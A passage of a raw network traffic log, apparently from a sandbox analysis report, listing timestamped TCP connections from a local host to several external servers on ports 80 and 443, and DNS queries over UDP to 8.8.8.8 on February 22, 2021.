                                                                                                                                                Feb 22, 2021 23:45:56.763926983 CET4998780192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.769509077 CET8049996192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.769618034 CET4999680192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.770348072 CET4999680192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.937908888 CET8049996192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.937943935 CET8049996192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.938085079 CET4999680192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:45:56.939634085 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:56.942919970 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:56.985768080 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.985857010 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:56.986468077 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:56.987165928 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.990084887 CET44349988216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:56.990160942 CET49988443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.029220104 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.040009975 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.040079117 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.040110111 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.040121078 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.040148973 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.040162086 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.046135902 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.094918966 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.097362041 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.097521067 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.098211050 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.143884897 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.280777931 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.280802965 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.280822039 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.280837059 CET44349997216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.280961990 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.281064987 CET49997443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:45:57.486366987 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.488903046 CET4999880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.542898893 CET8049989104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.543051004 CET4998980192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.545442104 CET8049998104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.545595884 CET4999880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.546020985 CET4999880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.604357958 CET8049998104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.718389034 CET8049998104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.718935966 CET4999880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.721556902 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.724670887 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.780231953 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.780278921 CET44349990104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.780436039 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.780493975 CET49990443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.782819986 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.782979012 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.783989906 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.842199087 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.842252970 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.845577955 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.846616983 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.856101036 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:57.902985096 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:57.912667990 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.016232014 CET44349999104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.016431093 CET49999443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:45:58.020210981 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.076709986 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.076858997 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.077919006 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.134211063 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.134577990 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.134660006 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.135166883 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.141284943 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.191884995 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.197577000 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.323957920 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.323993921 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324016094 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324043036 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324249983 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.324372053 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324434996 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324476004 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324491978 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324551105 CET44350000104.244.42.6192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.324584007 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.324672937 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.324682951 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.324923038 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.324978113 CET50000443192.168.2.6104.244.42.6
                                                                                                                                                Feb 22, 2021 23:45:58.326515913 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.330061913 CET5000180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.376204967 CET8049992172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.376336098 CET4999280192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.382884026 CET8050001172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.383059978 CET5000180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.384169102 CET5000180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.437077045 CET8050001172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.842711926 CET8050001172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.842916965 CET5000180192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.849654913 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.903808117 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.903959990 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.905041933 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.959291935 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.960438967 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:58.960566998 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.961544991 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:58.974870920 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.014435053 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.027679920 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557627916 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557655096 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557681084 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557694912 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557720900 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557723999 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.557738066 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557760954 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.557760954 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557779074 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557787895 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.557801962 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557810068 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.557816982 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.557842970 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.557876110 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.558242083 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.558260918 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.558265924 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.558294058 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.558324099 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.558372021 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.591247082 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.591269970 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.591341972 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.591516018 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.591531038 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.591555119 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.591586113 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.592200994 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.592237949 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.592272997 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.592319965 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.592544079 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.593504906 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.593523026 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.593585968 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.594753027 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.594780922 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.594856977 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.595990896 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.596014977 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.596077919 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.597284079 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.597307920 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.597363949 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.598556042 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.598587990 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.598629951 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.598671913 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.599833965 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.599864960 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.599926949 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.613631010 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.613672972 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.613704920 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.613746881 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.614234924 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.614264011 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.614300966 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.614341974 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.615511894 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.615534067 CET44350002172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.615600109 CET50002443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:45:59.678670883 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.679636002 CET5000380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.748646021 CET80499945.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.748743057 CET4999480192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.752561092 CET80500035.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.752723932 CET5000380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.753278971 CET5000380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.826709032 CET80500035.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.826913118 CET80500035.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.826993942 CET5000380192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.832185030 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.903124094 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.903254986 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.903907061 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.974306107 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.974471092 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:45:59.974569082 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.975219965 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:45:59.976026058 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.044311047 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403352976 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403417110 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403458118 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403495073 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403528929 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403543949 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403587103 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403619051 CET443500045.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:46:00.403686047 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403733015 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403739929 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403744936 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403750896 CET50004443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:46:00.403755903 CET50004443192.168.2.65.9.110.84

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Feb 22, 2021 23:43:48.485006094 CET5507453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:48.506253958 CET5451353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:48.533788919 CET53550748.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:48.555104971 CET53545138.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:49.448590040 CET6204453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:49.498491049 CET53620448.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:50.396351099 CET6379153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:50.449040890 CET53637918.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:51.347505093 CET6426753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:51.398274899 CET53642678.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:51.594635963 CET4944853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:51.655985117 CET53494488.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:52.290426016 CET6034253192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:52.342267990 CET53603428.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:53.242691994 CET6134653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:53.291551113 CET53613468.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:55.315534115 CET5177453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:55.372832060 CET53517748.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:56.296413898 CET5602353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:56.353748083 CET53560238.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.029077053 CET5838453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:57.091340065 CET53583848.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:57.242928982 CET6026153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:57.295279026 CET53602618.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.140388966 CET5606153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:58.200539112 CET53560618.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.205164909 CET5833653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:58.258294106 CET53583368.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:58.545612097 CET5378153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:58.606184006 CET53537818.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.004766941 CET5406453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:59.062094927 CET53540648.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.170593977 CET5281153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:59.177408934 CET5529953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:59.228187084 CET53528118.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.230046034 CET53552998.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:43:59.859427929 CET6374553192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:43:59.908286095 CET53637458.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.151371002 CET5005553192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:00.204440117 CET53500558.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.317826033 CET6137453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:00.380970001 CET53613748.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.093204021 CET5033953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:01.144877911 CET53503398.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.049936056 CET6330753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:02.098681927 CET53633078.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.993947029 CET4969453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:03.046668053 CET53496948.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.776860952 CET5498253192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:03.834188938 CET53549828.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.038350105 CET5001053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:04.096559048 CET53500108.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.012084007 CET6371853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:05.069087029 CET53637188.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.332133055 CET6211653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:06.381885052 CET53621168.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:07.991556883 CET6381653192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:08.048918009 CET53638168.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:13.409130096 CET5501453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:13.466650963 CET53550148.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:17.268011093 CET6220853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:17.328210115 CET53622088.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:21.494102955 CET5757453192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:21.555789948 CET53575748.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:24.142749071 CET5181853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:24.191338062 CET53518188.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:25.394740105 CET5662853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:25.454904079 CET53566288.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:30.066056967 CET6077853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:30.123296976 CET53607788.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:35.155323029 CET5379953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:35.212421894 CET53537998.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.190032959 CET5468353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:39.254734039 CET53546838.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.182100058 CET5932953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:40.272046089 CET53593298.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.879087925 CET6402153192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:40.942260027 CET53640218.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.402070999 CET5612953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:41.467200994 CET53561298.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.580212116 CET5817753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:41.644588947 CET53581778.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.112272978 CET5070053192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:42.206638098 CET53507008.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.660784960 CET5406953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:42.722131014 CET53540698.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.113280058 CET6117853192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:43.170454979 CET53611788.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.266879082 CET5701753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:43.328690052 CET53570178.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.938287973 CET5632753192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:43.966837883 CET5024353192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:43.997673035 CET53563278.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.018205881 CET53502438.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:45.029443979 CET6205553192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:45.106859922 CET53620558.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:45.383481979 CET6124953192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:45.432066917 CET53612498.8.8.8192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:46.036154032 CET6525253192.168.2.68.8.8.8
                                                                                                                                                Feb 22, 2021 23:44:46.181462049 CET53652528.8.8.8192.168.2.6
